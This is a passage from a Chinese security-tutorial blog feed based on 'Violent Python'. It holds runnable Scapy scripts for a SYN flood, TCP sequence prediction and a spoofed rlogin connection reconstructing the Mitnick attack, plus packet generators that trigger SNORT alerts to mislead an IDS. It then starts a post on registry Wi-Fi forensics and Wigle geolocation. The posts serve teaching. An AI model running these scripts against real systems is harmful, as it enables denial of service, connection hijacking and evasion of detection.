        <span class="n">rcode</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">DNS</span><span class="p">).</span><span class="n">rcode</span>
        <span class="n">qname</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">DNSQR</span><span class="p">).</span><span class="n">qname</span>
        <span class="k">if</span> <span class="n">rcode</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[!] Name request lookup failed: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">qname</span><span class="p">))</span>
            <span class="k">return</span> <span class="bp">True</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">return</span> <span class="bp">False</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">un_ans_reqs</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">pkts</span> <span class="o">=</span> <span class="n">rdpcap</span><span class="p">(</span><span class="s">"domain_flux.pcap"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">pkt</span> <span class="ow">in</span> <span class="n">pkts</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">dns_qrtest</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
            <span class="n">un_ans_reqs</span> <span class="o">=</span> <span class="n">un_ans_reqs</span> <span class="o">+</span> <span class="mi">1</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[!] {} Total Unanswered Name Requests"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">un_ans_reqs</span><span class="p">))</span>
</code></pre></div></div>

<h2 id="kevin-mitnick-和-tcp-序列号预测">Kevin Mitnick 和 TCP 序列号预测</h2>

<p>Mitnick 使用了一种劫持 TCP 会话的方法。这种技术被称为 TCP 序列号预测，这一技术利用的是原本设计用来区分各个独立的网络连接的 TCP 序列号的生成缺乏随机性这一缺陷。这一缺陷加上 IP 地址欺骗，使得 Mitnick 能够劫持家用电脑中的某个连接。</p>

<h3 id="预测你自己的-tcp-序列号">预测你自己的 TCP 序列号</h3>

<p>Mitnick 攻击的机器与某台远程服务器之间有可信协议。远程服务器可以通过在 TCP 513 端口上运行的远程登录协议（rlogin）访问 Mitnick 被攻击的计算机。rlogin 并没有使用公钥/私钥协议或口令认证，而是使用了一种不太安全的认证方法——绑定源 IP 地址。</p>

<p>为了攻击电脑，Mitnick 必须做到以下 4 点：</p>

<p>（1）找到一个受信任的服务器</p>

<p>（2）使该服务器无法再做出响应</p>

<p>（3）伪造来自服务器的一个连接</p>

<p>（4）盲目伪造一个 TCP三次握手的适当说明</p>

<p>Mitnick 找到与个人电脑之间有可信协议的远程服务器后，需要使远程服务器不能再发出响应。如果远程服务器发现有人尝试使用服务器 IP 地址进行假连接，它将发送 TCP 重置（reset）数据包关闭连接。为了使服务器无法再做出响应，Mitnick 向服务器上的远程登录（rlogin）端口发出了许多 TCP SYN 数据包，即 SYN 泛洪攻击（SYN Flood），这种攻击将会填满服务器的连接队列，使之无法做出任何响应。</p>

<h3 id="使用-scapy-制造-syn-泛洪攻击">使用 Scapy 制造 SYN 泛洪攻击</h3>

<p>用 Scapy 重新实现 SYN 泛洪攻击，只需要制造一些载有 TCP 协议层的 IP 数据包，让这些包里 TCP 源端口不断地自增一，而目的 TCP 端口总是为 513</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>

<span class="k">def</span> <span class="nf">syn_flood</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">target</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">sport</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1024</span><span class="p">,</span> <span class="mi">65535</span><span class="p">):</span>
        <span class="n">ip_layer</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">target</span><span class="p">)</span>
        <span class="n">tcp_layer</span> <span class="o">=</span> <span class="n">TCP</span><span class="p">(</span><span class="n">sport</span><span class="o">=</span><span class="n">sport</span><span class="p">,</span> <span class="n">dport</span><span class="o">=</span><span class="mi">513</span><span class="p">)</span>
        <span class="n">pkt</span> <span class="o">=</span> <span class="n">ip_layer</span> <span class="o">/</span> <span class="n">tcp_layer</span>
        <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">)</span>
<span class="n">src</span> <span class="o">=</span> <span class="s">"10.1.1.2"</span>
<span class="n">target</span> <span class="o">=</span> <span class="s">"192.168.1.3"</span>
<span class="n">syn_flood</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">target</span><span class="p">)</span>
</code></pre></div></div>
<h3 id="计算-tcp-序列号">计算 TCP 序列号</h3>

<p>Mitnick 能够伪造一个 TCP 连接到目标。不过，这取决于他能够发送伪造 SYN 包的能力，接着被攻击的机器会返回一个 TCP SYN-ACK 包确认连接。为了完成连接，Mitnick 需要在 SYN-ACK 中正确地猜出 TCP 的序列号（因为他无法观察到），然后把猜到的正确的 TCP 序列号放在 ACK 包中发送回去。</p>

<p>在 Python 中重现这一过程，将发送一个 TCP SYN 包，然后等待 TCP SYN-ACK 包。收到之后，将从这个确认包中读出 TCP 序列号，并把它打印到屏幕上。编写的函数 <code class="language-plaintext highlighter-rouge">cal_tsn</code> 将接收目标 IP 地址这个参数，返回下一个 SYN-ACK 包的序列号（当前 SYN-ACK 包的序列号加上差值）</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">cal_tsn</span><span class="p">(</span><span class="n">target</span><span class="p">):</span>
    <span class="n">seq_num</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">pre_num</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">diff_seq</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">5</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">pre_num</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
            <span class="n">pre_num</span> <span class="o">=</span> <span class="n">seq_num</span>
        <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">dst</span><span class="o">=</span><span class="n">target</span><span class="p">)</span> <span class="o">/</span> <span class="n">TCP</span><span class="p">()</span>
        <span class="n">ans</span> <span class="o">=</span> <span class="n">sr1</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">verbose</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
        <span class="n">seq_num</span> <span class="o">=</span> <span class="n">ans</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">TCP</span><span class="p">).</span><span class="n">seq</span>
        <span class="n">diff_seq</span> <span class="o">=</span> <span class="n">seq_num</span> <span class="o">-</span> <span class="n">pre_num</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] TCP Seq Difference: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">diff_seq</span><span class="p">))</span>
	<span class="k">return</span> <span class="n">seq_num</span> <span class="o">+</span> <span class="n">diff_seq</span>

<span class="n">target</span> <span class="o">=</span> <span class="s">"192.168.1.106"</span>
<span class="n">seq_num</span> <span class="o">=</span> <span class="n">cal_tsn</span><span class="p">(</span><span class="n">target</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"[+] Next TCP Sequence Number to ACK is: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">seq_num</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span>
</code></pre></div></div>

<h3 id="伪造-tcp-连接">伪造 TCP 连接</h3>

<p>在 Python 中重现这一行为，将创建和发送两个数据包。首先，创建一个 TCP 源端口为 513，目标端口为 514，源 IP 地址为被假冒的服务器，目标 IP 地址为被攻击计算机的 SYN 包。接着，创建一个相同的 ACK 包，并把计算得到的序列号填入相应的字段中，最后把它发送出去</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>

<span class="k">def</span> <span class="nf">spoof_conn</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">target</span><span class="p">,</span> <span class="n">ack</span><span class="p">):</span>
    <span class="n">ip_layer</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">target</span><span class="p">)</span>
    <span class="n">tcp_layer</span> <span class="o">=</span> <span class="n">TCP</span><span class="p">(</span><span class="n">sport</span><span class="o">=</span><span class="mi">513</span><span class="p">,</span> <span class="n">dport</span><span class="o">=</span><span class="mi">514</span><span class="p">)</span>
    <span class="n">syn_pkt</span> <span class="o">=</span> <span class="n">ip_layer</span> <span class="o">/</span> <span class="n">tcp_layer</span>
    <span class="n">send</span><span class="p">(</span><span class="n">syn_pkt</span><span class="p">)</span>
    <span class="n">ip_layer</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">target</span><span class="p">)</span>
    <span class="n">tcp_layer</span> <span class="o">=</span> <span class="n">TCP</span><span class="p">(</span><span class="n">sport</span><span class="o">=</span><span class="mi">513</span><span class="p">,</span> <span class="n">dport</span><span class="o">=</span><span class="mi">514</span><span class="p">,</span> <span class="n">ack</span><span class="o">=</span><span class="n">ack</span><span class="p">)</span>
    <span class="n">ack_pkt</span> <span class="o">=</span> <span class="n">ip_layer</span> <span class="o">/</span> <span class="n">tcp_layer</span>
    <span class="n">send</span><span class="p">(</span><span class="n">ack_pkt</span><span class="p">)</span>

<span class="n">src</span> <span class="o">=</span> <span class="s">"10.1.1.2"</span>
<span class="n">target</span> <span class="o">=</span> <span class="s">"192.168.1.106"</span>
<span class="n">seq_num</span> <span class="o">=</span> <span class="mi">2024371201</span>
<span class="n">spoof_conn</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">target</span><span class="p">,</span> <span class="n">seq_num</span><span class="p">)</span>
</code></pre></div></div>

<h2 id="使用-scapy-愚弄入侵检测系统">使用 Scapy 愚弄入侵检测系统</h2>

<p>入侵检测系统（Intrusion DetectionSystem，IDS），基于网络的入侵检测系统（network-based intrusion detection system，NIDS）可以通过记录流经 IP 网络的数据包实时地分析流量。用已知的恶意特征码对数据包进行扫描，IDS 可以在攻击成功之前就向网络分析师发出警报。SNORT 这个 IDS 系统自带的许多不同规则，就使它能够识别出许多包括不同类型的踩点，漏洞利用已经拒绝服务攻击在内的真实环境中的攻击手段。检查其中一些规则配置文件中的内容，可以看到针对 TFN、tfn2k 和 Trin00 分布式拒绝服务攻击工具包的四个警报触发规则。</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat</span> /etc/snort/rules/ddos.rules
</code></pre></div></div>

<p>第一条警报触发规则——DDoS TFN 探针（DDoS TFN Probe）</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">ddos_test</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="p">):</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">ICMP</span><span class="p">(</span><span class="nb">type</span><span class="o">=</span><span class="mi">8</span><span class="p">,</span><span class="nb">id</span><span class="o">=</span><span class="mi">678</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"1234"</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">ICMP</span><span class="p">(</span><span class="nb">type</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"AAAAAAAAA"</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">UDP</span><span class="p">(</span><span class="n">dport</span><span class="o">=</span><span class="mi">31335</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"PONG"</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">ICMP</span><span class="p">(</span><span class="nb">type</span><span class="o">=</span><span class="mi">0</span><span class="p">,</span> <span class="nb">id</span><span class="o">=</span><span class="mi">456</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
    
<span class="n">src</span> <span class="o">=</span> <span class="s">"1.3.3.7"</span>
<span class="n">dst</span> <span class="o">=</span> <span class="s">"192.168.1.106"</span>
<span class="n">iface</span> <span class="o">=</span> <span class="s">"eth0"</span>
<span class="n">count</span> <span class="o">=</span> <span class="mi">1</span>
<span class="n">ddos_test</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="p">)</span>
</code></pre></div></div>

<p>接着看 SNORT 的 <code class="language-plaintext highlighter-rouge">exploit.rules</code> 签名文件中更复杂的警报触发规则：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">exploit_test</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="p">):</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">UDP</span><span class="p">(</span><span class="n">dport</span><span class="o">=</span><span class="mi">518</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"</span><span class="se">\x01\x03\x00</span><span class="s">..."</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">UDP</span><span class="p">(</span><span class="n">dport</span><span class="o">=</span><span class="mi">635</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"^</span><span class="se">\xB0\x02</span><span class="s">..."</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
</code></pre></div></div>

<p>最后，伪造一些踩点或扫描操作也挺不错的。查看 SNORT 中关于扫描的警报触发规则，找到两个可以生成对应数据包的警报触发规则。这两个规则检测的是：发往 UDP 协议上的某些特定端口的数据包的内容中有无特定的特征码，如果有，则触发警报。</p>

<p>以下生成了两个会触发 cybercop 扫描器和 Amanda 扫描器扫描报警的数据包：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">scan_test</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="p">):</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">UDP</span><span class="p">(</span><span class="n">dport</span><span class="o">=</span><span class="mi">7</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"cybercop"</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">)</span>
    <span class="n">pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">src</span><span class="o">=</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="o">=</span><span class="n">dst</span><span class="p">)</span> <span class="o">/</span> <span class="n">UDP</span><span class="p">(</span><span class="n">dport</span><span class="o">=</span><span class="mi">10080</span><span class="p">)</span> <span class="o">/</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="s">"Amanda"</span><span class="p">)</span>
    <span class="n">send</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">iface</span><span class="o">=</span><span class="n">iface</span><span class="p">,</span> <span class="n">count</span><span class="o">=</span><span class="n">count</span><span class="p">)</span>
</code></pre></div></div>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="cybersecurity" /><category term="network" /><summary type="html"><![CDATA[用 Python 分析网络流量]]></summary></entry><entry><title type="html">Forensic Investigations with Python</title><link href="https://crabin.github.io/posts/2024/08/Forensic%20Investigations%20with%20Python/" rel="alternate" type="text/html" title="Forensic Investigations with Python" /><published>2024-08-21T00:00:00+00:00</published><updated>2024-08-21T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2024/08/Forensic%20Investigations%20with%20Python</id><content type="html" xml:base="https://crabin.github.io/posts/2024/08/Forensic%20Investigations%20with%20Python/"><![CDATA[<h2 id="用-python-进行取证调查">用 Python 进行取证调查</h2>

<h2 id="你曾经去过哪里在注册表中分析无线访问热点">你曾经去过哪里？——在注册表中分析无线访问热点</h2>

<p>Windows 注册表是一个分层式的数据库，其中存储了操作系统的配置设置信息。</p>

<p>从 <code class="language-plaintext highlighter-rouge">Windows Vista</code> 起，注册表在 <code class="language-plaintext highlighter-rouge">HKLM\SOFT_WARE\Microsoft\Windows NT\CurrentVersion\Network-List\Signatures\Unmanaged</code> 子键中就会存储所有的网络信息。在 Windows 命令行提示符中，我们能列出每个网络显示出 <code class="language-plaintext highlighter-rouge">profile Guid</code> 对网络的描述、网络名和网关的 MAC 地址。</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\r</span>eg query <span class="s2">"HKEY_LOCAL_MACHINE</span><span class="se">\S</span><span class="s2">OFTWARE</span><span class="se">\M</span><span class="s2">icrosoft</span><span class="se">\W</span><span class="s2">indows NT</span><span class="se">\C</span><span class="s2">urrentVersion</span><span class="se">\N</span><span class="s2">etworkList</span><span class="se">\S</span><span class="s2">ignatures</span><span class="se">\U</span><span class="s2">nmanaged"</span> /s HKEY_LOCAL_MACHINE<span class="se">\S</span>OFTWARE<span class="se">\M</span>icrosoft<span class="se">\W</span>indowsNT<span class="se">\C</span>urrentVersion<span class="se">\N</span>etworkList<span class="se">\S</span>ignatures<span class="se">\U</span>nmanaged<span class="se">\0</span>10103000F0000F008000000F0000F04BCC2360E4B8F7DC8BDAFAB8AE....

ProfileGuid	REG_SZ	...
Description	REG_SZ	...
</code></pre></div></div>

<h3 id="使用-winreg-读取-windows-注册表中的内容">使用 WinReg 读取 Windows 注册表中的内容</h3>

<p>注册表中把网关 MAC 地址存为 <code class="language-plaintext highlighter-rouge">REG_BINARY</code> 类型的。形如：<code class="language-plaintext highlighter-rouge">00115024687F0000</code>，其实就是地址 <code class="language-plaintext highlighter-rouge">00:11:50:24:68:7F</code>，下面这个函数可以实现转换：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">val2addr</span><span class="p">(</span><span class="n">val</span><span class="p">):</span>
    <span class="n">addr</span> <span class="o">=</span> <span class="nb">str</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">ch</span> <span class="ow">in</span> <span class="n">val</span><span class="p">:</span>
        <span class="n">addr</span> <span class="o">+=</span> <span class="s">"%02x "</span> <span class="o">%</span> <span class="nb">ord</span><span class="p">(</span><span class="n">ch</span><span class="p">)</span>
    <span class="n">addr</span> <span class="o">=</span> <span class="n">addr</span><span class="p">.</span><span class="n">strp</span><span class="p">(</span><span class="s">" "</span><span class="p">).</span><span class="n">replace</span><span class="p">(</span><span class="s">" "</span><span class="p">,</span> <span class="s">":"</span><span class="p">)[</span><span class="mi">0</span><span class="p">:</span><span class="mi">17</span><span class="p">]</span>
    <span class="k">return</span> <span class="n">addr</span>
</code></pre></div></div>

<p>接下来要从 Windows 注册表指定的键值中提取各个被列出来的网络名称和 MAC 地址。需要使用 <code class="language-plaintext highlighter-rouge">_winreg</code> 库，这是 Python 的 Windows 版安装程序默认会安装的一个库。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">_winreg</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">print_nets</span><span class="p">():</span>
    <span class="n">net</span> <span class="o">=</span> <span class="s">"SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged"</span>
    <span class="n">key</span> <span class="o">=</span> <span class="n">OpenKey</span><span class="p">(</span><span class="n">HKEY_LOCAL_MACHINE</span><span class="p">,</span> <span class="n">net</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] Networks You have Joined."</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">100</span><span class="p">):</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">guid</span> <span class="o">=</span> <span class="n">EnumKey</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span>
            <span class="n">net_key</span> <span class="o">=</span> <span class="n">OpenKey</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">guid</span><span class="p">))</span>
            <span class="n">n</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">t</span> <span class="o">=</span> <span class="n">EnumValue</span><span class="p">(</span><span class="n">net_key</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span>
            <span class="n">n</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">t</span> <span class="o">=</span> <span class="n">EnumValue</span><span class="p">(</span><span class="n">net_key</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span>
            <span class="n">mac_addr</span> <span class="o">=</span> <span class="n">val2addr</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span>
            <span class="n">net_name</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">name</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] {} {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">net_name</span><span class="p">,</span> <span class="n">mac_addr</span><span class="p">))</span>
            <span class="n">CloseKey</span><span class="p">(</span><span class="n">net_key</span><span class="p">)</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="k">break</span>
</code></pre></div></div>

<p>确保在拥有管理员权限的命令行窗口中运行，就可以读取注册表中的键值</p>

<h3 id="使用-mechanize-把-mac-地址传给-wigle">使用 Mechanize 把 MAC 地址传给 Wigle</h3>

<p>知道了无线访问热点的 MAC 地址之后，可以把访问热点的物理位置也打印出来。许多数据库中，都有海量的把无线访问热点与它们所在的物理位置相对应起来的列表。</p>

<p><a href="http://www.skyhookwireless.com">SkyHook 数据库</a>提供了一个根据 Wi-Fi 的位置获取地理位置信息的软件开发包。Ian McCracken 开发的一个<a href="http://code.google.com/p/maclocate/">开源项目</a>让我们能访问这个数据库。还有 Google、微软等都有 Wi-Fi 地址位置数据库。</p>

<p>数据库，也是<a href="wigle.net">开源项目</a>仍然允许用户根据无线访问热点的 MAC 地址得到它所在的物理位置。通过网页查询某个无线 SSID MAC 地址对应的物理位置，并收集响应页面。其中返回结果 <code class="language-plaintext highlighter-rouge">maplat=47.25264359&amp;maplon=-87.25624084</code> 表示的就是无线访问热点的经度和纬度。</p>

<p>需要使用 <code class="language-plaintext highlighter-rouge">mechanize</code> 库，它允许 Python 编写带状态的 Web 程序。也就是说在正确地登陆 Wigle 服务器后，它会保存和重用登陆认证 cookie。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">mechanize</span><span class="p">,</span> <span class="n">urllib</span><span class="p">,</span> <span class="n">re</span><span class="p">,</span> <span class="n">urlparse</span>
<span class="k">def</span> <span class="nf">wigle_print</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="n">netid</span><span class="p">):</span>
    <span class="n">browser</span> <span class="o">=</span> <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">()</span>
    <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"http://wigle.net"</span><span class="p">)</span>
    <span class="n">req_data</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">urlencode</span><span class="p">({</span><span class="s">"credential_0"</span><span class="p">:</span> <span class="n">username</span><span class="p">,</span> <span class="s">"credential_1"</span><span class="p">:</span> <span class="n">password</span><span class="p">})</span>
    
    <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"https://wigle.net/gps/gps/main/login"</span><span class="p">,</span> <span class="n">req_data</span><span class="p">)</span>
    <span class="n">params</span> <span class="o">=</span> <span class="p">{}</span>
    <span class="n">params</span><span class="p">[</span><span class="s">"netid"</span><span class="p">]</span> <span class="o">=</span> <span class="n">netid</span>
    <span class="n">req_params</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">urlencode</span><span class="p">(</span><span class="n">params</span><span class="p">)</span>
    <span class="n">resp_url</span> <span class="o">=</span> <span class="s">"http://wigle.net/gps/gps/main/confirmquery/"</span>
    <span class="n">resp</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">resp_url</span><span class="p">,</span> <span class="n">req_params</span><span class="p">).</span><span class="n">read</span><span class="p">()</span>
    <span class="n">map_lat</span> <span class="o">=</span> <span class="s">"N/A"</span>
    <span class="n">map_lon</span> <span class="o">=</span> <span class="s">"N/A"</span>
    <span class="n">r_lat</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">r</span><span class="s">"maplat=.*\&amp;"</span><span class="p">,</span> <span class="n">resp</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">r_lat</span><span class="p">:</span>
        <span class="n">map_lat</span> <span class="o">=</span> <span class="n">r_lat</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">"&amp;"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">"="</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
